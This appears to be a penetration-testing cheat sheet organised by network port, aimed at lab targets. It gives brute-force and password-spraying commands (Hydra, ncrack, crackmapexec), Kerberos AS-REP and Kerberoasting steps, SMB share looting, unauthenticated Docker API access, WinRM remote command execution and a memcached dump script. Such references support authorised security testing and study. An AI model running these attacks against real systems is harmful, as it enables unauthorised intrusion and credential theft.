- Port 21
- Port 22
- Port 25
- Port 80
- Port 88
- Port 110
- Port 111
- Port 139, 445
- Port 143
- Port 389
- Port 587
- Port 1433
- Port 2375
- Port 3389
- Port 5672
- Port 5985
- Port 11211
- Port 15672
nmap -sS -sV -vv -Pn -p<PORT> <IP>
nmap -T4 -sS -A -p- <IP>
nmap -T4 -sS -sC -p- -Pn <IP>
nmap -T4 -sUV <IP>
nmap -T4 -A -sUV --top-ports 1000 -Pn <IP>
ls -l /usr/share/nmap/scripts/smb*
masscan -p21,22,443,8000-8100 10.0.0.0/24
knockpy domain.com -w /usr/share/wordlists/list --silent csv -o /path/to/new/folder
usage: knockpy [-h] [-v] [--no-local] [--no-remote] [--no-scan] [--no-http]
[--no-http-code CODE [CODE ...]] [--dns DNS] [-w WORDLIST]
[-o FOLDER] [-t SEC] [-th NUM] [--silent [{False,json,json-pretty,csv}]]
domain
dirb http://10.0.0.1/abc/ /usr/share/wordlists/dirb/big.txt
.html,.php,.asp,.aspx,.htm,.xml,.json,.jsp,.pl,.ini,.bak,.bck.
gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20
gobuster dir -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/big.txt -t 30 -e -k -x .html,.php,.asp,.aspx,.htm,.xml,.json,.jsp,.pl
➤ Error: the server returns a status code that matches the provided options for non existing urls. https://10.0.0.1 => 200 (Length: 1474).
Solution - exclude the specific length : --exclude-length [size]
Example : gobuster -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20 --exclude-length 1474
➤ Error: the server returns a status code that matches the provided options for non existing urls. https://10.0.0.1 => 401 (Length: 98).
Solution - exclude the 401 status code : -b 404,401
Example : gobuster -u http://10.0.0.1/ -w /usr/share/wordlists/dirb/common.txt -e -t 20 -b 404,401
gobuster fuzz -u http://10.0.0.1/user/FUZZ/condig -w /usr/share/wordlists/dirb/common.txt -e -t 20
nikto -host=http://example.com
https://dnsdumpster.com/
https://search.censys.io/
https://crt.sh/
https://archive.org/
https://www.robtex.com/
nmap -p 21 -sV -sC --script="ftp-vuln-*, ftp-anon" 10.0.0.1-254
#Hydra - Password spraying
hydra -s 21 -t 4 -L username.lst -p password01! 10.0.0.1 ftp
#Hydra - Bruteforce specific user
hydra -s 21 -t 4 -l admin -P /usr/share/wordlists/rockyou.txt 10.0.0.1 ftp
#Hydra - Bruteforce common login:password
hydra -s 21 -C /home/kali/wordlists/legion/ftp-betterdefaultpasslist.txt -u -f 10.0.0.1 ftp
#Medusa
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
➤ Connection
ftp 10.0.0.1 21
➤ Upload a file (from the folder where the shell has been started)
binary
put <filename>
➤ Download a file (to the folder where the shell has been started)
binary
get <filename>
➤ 229 Entering Extended Passive Mode (|||26826|)
#Hydra - Bruteforce specific user
hydra -s 22 -v -t 4 -l root -P /usr/share/wordlists/rockyou.txt 10.0.0.1 ssh
#Hydra - Password spraying
hydra -L user.txt -p password01! 10.0.0.1 ssh
#Hydra - Full bruteforce
hydra -L user.txt -P rockyou.txt 10.10.219.212 ssh
ssh lexis@10.0.0.1
ssh lexis@10.0.0.1 -oKexAlgorithms=+diffie-hellman-group1-sha1
ssh lexis@10.0.0.1
lexis@10.0.0.1's password:
Last login: Thu Feb 24 08:42:29 2022 from 192.168.1.1
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ E R R O R @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
The .bash_profile file for the server you are attempting to
connect to has encountered an error. This could mean that
your access has been disabled. Please contact a system
administrator to restore your access to this server.
Connection to 10.0.0.1
ssh -t lexis@10.0.0.1 /bin/sh
lexis@10.0.0.1's password:
sh-05$
chmod 600 id_rsa
ssh -i id_rsa kiosec@10.0.0.1
telnet 10.0.0.1 25
Trying 10.0.0.1
Connected to 10.0.0.1.
Escape character is '^]'.
220 mail.local ESMTP Postfix (Debian/GNU)
VRFY {username}
➤ Valid username
252 2.0.0 useradm
➤ Invalid username
550 5.1.1 <admin>: Recipient address rejected:User unknown in local recipient table
wpscan --url http://10.0.0.1/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --api-token {token-api}
Service : kerberos-sec Microsoft Windows Kerberos
# Install kerbrute : https://github.com/ropnop/kerbrute/releases
# Remember to add the domain to /etc/hosts -> echo '@IP @domain' >> /etc/hosts (example: echo '10.0.0.1 cyberlab.local' >> /etc/hosts)
# Enumerate the user
root@kali:~# kerbrute userenum -d <domain_name> --dc <dns_domain_name> userlist.txt -t 100
Important note: once a list of users has been found, try to obtain the TGT ticket (AS-REP roasting through GetNPUsers.py)
# Password Spraying
root@kali:~# ./kerbrute_linux_amd64 passwordspray -d <domain_name> domain-users.txt Password123
rpcinfo -p 10.0.0.1
rpcclient -U "" 10.0.0.1
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.0.1
enum4linux -a 10.0.0.1
nmap -p 445,139 -Pn --script smb-protocols.nse 10.0.0.1
nmap -v -p 139,445 --script=smb-os-discovery 10.0.0.1
nmap -v -p 139,445 --script=smb* 10.0.0.1
nmap -p 445,139 -Pn --script=smb-vuln-*.nse 10.0.0.1 // Does not report every vulnerability because some scripts need specific arguments
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.0.0.1
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 10.0.0.1
#Enumerate the shares
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.0.1
smbclient -L \\10.0.0.1
smbclient -L 10.0.0.1 -U anonymous
smbclient -L 10.0.0.1 --options='client min protocol=NT1'
smbclient \\\\10.10.155.41\\<share_name>
root@ip-10-10-148-27:~# smbclient \\\\10.10.155.41\\Users
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Mar 12 02:11:49 2021
.. DR 0 Fri Mar 12 02:11:49 2021
Administrator D 0 Thu Mar 11 21:55:48 2021
All Users DHS 0 Sat Sep 15 08:28:48 2018
atlbitbucket D 0 Thu Mar 11 22:53:06 2021
<...>
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Administrator\*
STATUS_STOPPED_ON_SYMLINK listing \All Users\*
STATUS_STOPPED_ON_SYMLINK listing \*
smb: \All Users\>
smbmap -H 10.0.0.1
➤ Recursive enumeration
smbmap -H 10.0.0.1 -r
➤ Recursive enumeration on a specific folder
smbmap -H 10.0.0.1 -R 'Replication\active.htb'
➤ Authenticated enumeration
smbmap -H 10.0.0.1 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R
➤ Download a file
smbmap -H 10.10.0.1 --download '.\Users\SVC_TGS\Desktop\user.txt'
➤ If the error '[!] Authentication error on 10.0.0.1' appears, try with a fake user: -u '123'
smbmap -H 10.0.0.1 -R -u '123'
If the following error appears, "protocol negotiation failed : NT_STATUS_CONNECTION_DISCONNECTED", it is probably due to the old SMB version on the victim.
Solution: intercept the traffic of the command 'smbclient -L \\<IP>' with Wireshark and look for the SMB version negotiation.
smb://<ip>/<folder>
#Example with the folder named anonymous
smbget -R smb://10.0.0.1/anonymous
#Example with a specific file
smbget -r smb://10.0.0.1/folder/file
press enter
mount -t cifs //10.0.0.1/share /mnt/share
mount -t cifs -o "username=user,password=password" //10.0.0.1/share /mnt/share
hydra -L users.txt -P passs.txt smb://10.0.0.1 -t 4
hydra -L username.txt -P password.txt 10.0.0.1 smb -V
crackmapexec smb <IP> -d <DOMAIN> -u users.txt -p 'PASSWORD'
→ EX: crackmapexec smb 10.0.0.1 -d frabricorp -u users.txt -p '123Soleil'
STATUS_PASSWORD_MUST_CHANGE : the password is correct but has expired and must be changed before logging in
STATUS_LOGIN_FAILURE : incorrect password
➤ Anonymous connection attempt (-x). With the example test.com : DOMAIN = test and DOMAIN2 = com
ldapsearch -h 10.129.136.235 -p 389 -x -b "dc=htb,dc=local"
➤ Enumerate all AD users (https://github.com/ropnop/windapsearch)
./windapsearch.py -d test.com --dc-ip 10.0.0.1 -U
➤ Enumerate all objects in the domain
./windapsearch.py -d test.com --dc-ip 10.0.0.1 --custom "objectClass=*"
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
The service account svc-alfresco has Kerberos pre-authentication disabled, which means the encrypted TGT for this user can be requested.
➤ Request a TGT ticket
./GetNPUsers.py DOMAIN/USERNAME -dc-ip <IP> -no-pass
➤ Next steps: crack the obtained TGT, then reuse the recovered credentials against port 5985 using evil-winrm
➤ Authenticated research. With the example test.com : DOMAIN = test and DOMAIN2 = com
ldapsearch -x -h <IP> -p <PORT> -D 'USERNAME' -w 'PASSWORD' -b "dc=DOMAIN,dc=DOMAIN2" -s sub"(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
OR
./GetADUsers.py -all DOMAIN/USERNAME -dc-ip <IP>
→ EX: ./GetADUsers.py -all domain.com/svc_tgs -dc-ip 10.0.0.1
OR
windapsearch.py -u "DOMAIN\USERNAME" --dc-ip <IP> -U
→ EX: ./windapsearch.py -u "FABRICORP\harry" --dc-ip 10.10.10.193 -U
➤ Verify if a SPN exist
ldapsearch -x -h 10.0.0.1 -p 389 -D 'SVC_TGS' -w'password' -b "dc=domain,dc=com" -s sub"(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
OR
./GetUserSPNs.py DOMAIN/USERNAME -dc-ip <IP>
→ EX: ./GetUserSPNs.py domain.com/svc_tgs -dc-ip 10.0.0.1
→ OUTPUT: active/CIFS:445 -> a SPN exists
➤ Request a SPN token
./GetUserSPNs.py DOMAIN/USERNAME -dc-ip <IP> -request
→ EX: ./GetUserSPNs.py domain.com/svc_tgs -dc-ip 10.0.0.1 -request
➤ Wmiexec equivalent to psexec
./wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
→ EX: ./wmiexec.py domain.com/administrator:password@10.0.0.1
sqsh -U sa -P password -S 10.0.0.1:1433 -D mydb
go -m pretty
Default docker port
nmap -sV -p 2375 10.0.0.1
curl http://10.0.0.1:2375/version
{
"Platform": {
"Name": "Docker Engine - Community"
},
"Components": [
{
"Name": "Engine",
"Version": "20.10.20",
"Details": {
"ApiVersion": "1.41",
"Arch": "amd64",
"BuildTime": "2022-10-18T18:18:12.000000000+00:00",
"Experimental": "false",
"GitCommit": "03df974",
"GoVersion": "go1.18.7",
"KernelVersion": "5.15.0-1022-aws",
"MinAPIVersion": "1.12",
"Os": "linux"
}]
}
# To test if we can run commands, we'll list the containers on the target
docker -H tcp://10.0.0.1:2375 ps
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.0.0.1
hydra -L user.txt -P pass.txt 10.0.0.1 rdp
ncrack -vv --user administrator -P passwords.txt rdp://10.0.0.1,CL=1
rdesktop 10.0.0.1
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
nmap -sV -Pn -n -T4 -p 5672 --script amqp-info 10.0.0.1
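import amqp

# Open an AMQP connection to the broker and print every server property
# it advertised during the handshake. The original snippet had lost the
# indentation of the print() line and did not parse.
# NOTE: relies on the third-party "amqp" package; host/port are the page's
# example values.
conn = amqp.connection.Connection(host="10.0.0.1", port=5672, virtual_host="/")
conn.connect()
for k, v in conn.server_properties.items():
    print(k, v)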
Details : https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Check a pair of credentials (Password) and execute a command
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Check a pair of credentials (Hash) and execute a PS command
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i <IP> -u <USERNAME> -p <PASSWORD>
OR
gem evil-winrm
evil-winrm -i <IP> -u <USERNAME> -p <PASSWORD>
nmap -n -sV --script memcached-info -p 11211 10.0.0.1
echo "version" | nc -vn -w 1 <IP> 11211 #Get version
echo "stats" | nc -vn -w 1 <IP> 11211 #Get status
echo "stats slabs" | nc -vn -w 1 <IP> 11211 #Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211 #Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211 #Get key names (the 0 is for unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211 #Get saved info
➤ Install and use memcdump
memcdump --verbose --debug --servers=10.0.0.1 | tee keys.lst
➤ Execute the script
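#!/bin/bash
# Dump each memcached key listed in keys.lst into its own <key>.txt file by
# sending a "get <key>" command to the server (same query as the manual
# `echo "get <item_name>" | nc ...` one-liner above).
#
# Fixes relative to the original: the command string was missing its closing
# quote (`echo "get $line | nc ...` swallowed the rest of the line), the port
# was 112111 instead of 11211, and the expansions were unquoted.
set -u
file="keys.lst"   # file which contains the keys, one per line
host="10.0.0.1"   # memcached server
port="11211"      # memcached port

# IFS= / -r preserve the key byte-for-byte; the || [[ -n ]] guard handles a
# last line without a trailing newline.
while IFS= read -r line || [[ -n "$line" ]]; do
  [[ -z "$line" ]] && continue   # skip blank lines
  # Quoted expansions: a key with spaces would otherwise be split, and the
  # output file name must be the whole key. Keys containing '/' would still
  # need an escaped file name — not handled here.
  printf 'get %s\n' "$line" | nc -vn -w 1 "$host" "$port" > "$line.txt"
done < "$file"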
The default credentials are guest:guest